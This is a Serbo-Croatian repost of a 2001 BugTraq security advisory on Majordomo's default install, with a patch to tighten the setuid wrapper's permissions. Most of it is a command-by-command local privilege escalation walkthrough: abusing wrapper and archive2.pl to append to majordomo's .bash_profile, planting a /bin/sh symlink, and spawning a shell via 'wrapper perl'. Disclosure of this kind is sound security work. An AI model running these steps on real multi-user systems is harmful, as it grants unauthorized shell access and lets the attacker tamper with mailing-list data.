Pri tome da se obrati pa�nja na security, posebno ukoliko je ma�ina visekorisni�ka
Preuzeto sa BUGTRAQ:
ps: na kraju za prilo�en i patch fajl ...
>>>-------- ISECI ISPOD
To: BugTraq
Subject: Majordomo default vulns
Date: Sep 14 2001 11:24AM
Author: Marco van Berkum <
[email protected]>
Hi,
I found something to discuss, this time involving majordomo.
This was tested on a Slackware linux 8.0 (kernel 2.4.8);
majordomo version 1.94.4, I also tested the other versions
and all _default_ installs had the same problem, note that
the versions 1.94.1 an 1.94.2 should NOT be used anymore,
those are way more simple to exploit.
We all know that if you install majordomo you should
CAREFULLY read the INSTALL file, simply because else
you will have a security problem. Only I doubt that everyone
actually follows the guidelines. Besides that, I feel that
Majordomodevelopers _could_ make a more secure default
install without affecting the functionality of the program.
A simple patch would _at least_ stop the possiblities which
are descibed below.
Also I did not find in the documents that majordomo should
have a shell (so give it a nologin or whatever, it works fine
without shell).
An example:
Who am i
marco@anubis:~$ id -a
uid=1001(marco) gid=100(users) groups=100(users)
This could happen if you give it a /home/majordomo
marco@anubis:~$ ls -al /home/|grep majordomo
drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/
Suidbit + executable for everyone (this is where the patch comes in)
marco@anubis:~$ ls -al ~majordomo/wrapper
-rwsr-xr-x 1 root daemon 16451 Aug 31 13:51
/home/majordomo/wrapper*
This is the program I'm going to abuse
marco@anubis:~$ ls -al ~majordomo/archive2.pl
-rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51
/home/majordomo/archive2.pl*
Make a template
marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test
Append majordomo's .bash_profile (or .profile etc..) with your template
using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is,
that one can use /'s, I need wrapper for becoming user majordomo
though).
marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a
~marco/test
Now hit the .bash_profile (sometimes the majordomo admin might need it
and do the same).
marco@anubis:~$ su - majordomo
Password:
majordomo@anubis:~$ id -a
uid=666(majordomo) gid=2(daemon) groups=2(daemon)
majordomo@anubis:~$ exit
See if it worked
marco@anubis:~$ ls -al ~majordomo/sh
lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57
/home/majordomo/sh -> /bin/sh*
Jupz it worked, now someone could abuse it, let's do that.
marco@anubis:~$ ~majordomo/wrapper sh
sh-2.05$ id -a
uid=666(majordomo) gid=2(daemon) groups=100(users)
sh-2.05$
Ok, I'm majordomo.
Also, in the README file is described how one could debug majordomo.
<quote>
Finally, if you're up to mucking around in the perl code, symlinking
perl into ~majordomo and invoking it via wrapper will give you a debug
environment with Majordomo's permissions and view of the world:
~majordomo% ./wrapper perl -d majordomo
</quote>
Well, same problem :)
Dont forget to remove the symlink or else everyone can do this:
marco@anubis:~$ /home/majordomo/wrapper perl
system("/bin/sh");
^D
sh-2.04$
One could append the perlfiles to make them execute your evil code of
course since the archive2 program appends. This could give a majordomo
uid/daemon gid shell.
The main point here is that we can write to majordomo owned files to
simply alter data in the lists or score a shell (and obtaining a daemon
gid).
reading the INSTALL file carefully will help you to prevent this, but I
prefer to apply a patch before starting the installation to make sure
that
the wrapper is not executable for everyone (it _should_ have 4750 and
not 4755).
--- simple patch to make default install more secure ---
--- Makefile.orig Fri Sep 14 09:43:45 2001
+++ Makefile Fri Sep 14 09:44:20 2001
@@ -42,7 +42,7 @@
# change these values!
WRAPPER_OWNER = root
WRAPPER_GROUP = $(W_GROUP)
-WRAPPER_MODE = 4755
+WRAPPER_MODE = 4750
POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP)
# Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4,
# HP DomainOS) then comment out the above four lines and uncomment
just my 2 cents,
grtz,
Marco van Berkum
--
GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---
O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----
G++ e- h+ r y*
+---------------------+------------------+-------------------+
| Marco van Berkum | MB17300-RIPE | Security Engineer |
|
http://ws.obit.nl | "Chernobyl used | Network Admin |
|
[email protected] | Windows" | UNIX |
+---------------------+------------------+-------------------+
<<<<---- KRAJ ISE�KA